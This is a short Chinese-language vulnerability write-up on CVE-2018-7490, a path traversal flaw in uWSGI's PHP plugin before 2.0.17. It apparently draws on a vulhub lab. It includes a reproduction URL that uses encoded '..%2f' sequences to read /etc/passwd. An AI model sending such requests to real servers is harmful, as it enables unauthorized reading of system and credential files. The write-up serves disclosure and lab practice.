# (CVE-2018-7490)uWSGI PHP目录穿越漏洞
======================================
一、漏洞简介
————
uWSGI是一款Web应用程序服务器,它实现了WSGI、uwsgi和http等协议,并支持通过插件来运行各种语言。
uWSGI
2.0.17之前的PHP插件,没有正确的处理`DOCUMENT_ROOT`检测,导致用户可以通过`..%2f`来跨越目录,读取或运行`DOCUMENT_ROOT`目录以外的文件。
二、漏洞影响
————
uWSGI \< 2.0.17 三、复现过程 ------------ 访问`http://www.0-sec.org:8080/..%2f..%2f..%2f..%2f..%2fetc/passwd`,成功读取文件: uWSGI_PHP目录穿越漏洞/img/rId24.png) 参考链接 -------- > https://github.com/vulhub/vulhub/blob/master/uwsgi/CVE-2018-7490/README.zh-cn.md
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容